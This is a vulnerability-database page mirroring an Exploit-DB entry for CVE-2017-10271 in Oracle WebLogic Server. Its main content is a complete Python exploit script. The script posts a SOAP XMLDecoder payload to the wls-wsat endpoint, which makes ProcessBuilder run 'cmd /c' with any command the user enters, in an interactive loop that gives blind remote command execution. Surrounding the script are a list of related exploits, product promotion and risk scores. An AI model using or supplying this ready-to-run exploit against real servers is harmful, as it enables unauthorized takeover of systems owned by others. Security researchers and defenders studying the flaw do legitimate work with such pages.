Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution

🗓️ 26 Dec 2017 00:00:00Reported by 1337gType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 513 Views

Oracle WebLogic Server Remote Command Execution using XML Soap Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
15 Oct 202515:06
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
28 Dec 201701:30
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
27 May 202607:37
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
16 Jan 201803:10
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
28 Dec 201707:19
githubexploit
GithubExploit		Exploit for Injection in Oracle Agile_Plm
23 Aug 201901:42
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
18 Nov 202002:31
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
13 Dec 201802:00
githubexploit
GithubExploit		Exploit for Improper Access Control in Oracle Communications_Diameter_Signaling_Router
31 May 202114:54
githubexploit
GithubExploit		Exploit for Missing Authentication for Critical Function in Oracle Weblogic_Server
5 Jan 201821:57
githubexploit
Rows per page
import requests
import sys

url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}


def payload_command (command_in):
    html_escape_table = {
        "&": "&",
        '"': """,
        "'": "'",
        ">": ">",
        "<": "<",
    }
    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
    payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
                "   <soapenv:Header> " \
                "       <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
                "           <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
                "               <void class=\"java.lang.ProcessBuilder\"> \n" \
                "                  <array class=\"java.lang.String\" length=\"3\">" \
                "                      <void index = \"0\">                       " \
                "                          <string>cmd</string>                 " \
                "                      </void>                                    " \
                "                      <void index = \"1\">                       " \
                "                          <string>/c</string>                  " \
                "                      </void>                                    " \
                "                      <void index = \"2\">                       " \
                + command_filtered + \
                "                      </void>                                    " \
                "                  </array>" \
                "                  <void method=\"start\"/>" \
                "                  </void>" \
                "            </java>" \
                "        </work:WorkContext>" \
                "   </soapenv:Header>" \
                "   <soapenv:Body/>" \
                "</soapenv:Envelope>"
    return payload_1

def do_post(command_in):
    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)

    if result.status_code == 500:
        print "Command Executed \n"
    else:
        print "Something Went Wrong \n"



print "***************************************************** \n" \
       "****************   Coded By 1337g  ****************** \n" \
       "*  CVE-2017-10271 Blind Remote Command Execute EXP  * \n" \
       "***************************************************** \n"

while 1:
    command_in = raw_input("Eneter your command here: ")
    if command_in == "exit" : exit(0)
    do_post(command_in)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Dec 2017 00:00Current
7.9High risk
Vulners AI Score7.9
CVSS 25
CVSS 3.17.5
EPSS0.94439
SSVC
oracle weblogic serverremote command executionxml soapvulnerabilitycve-2017-10271exp
513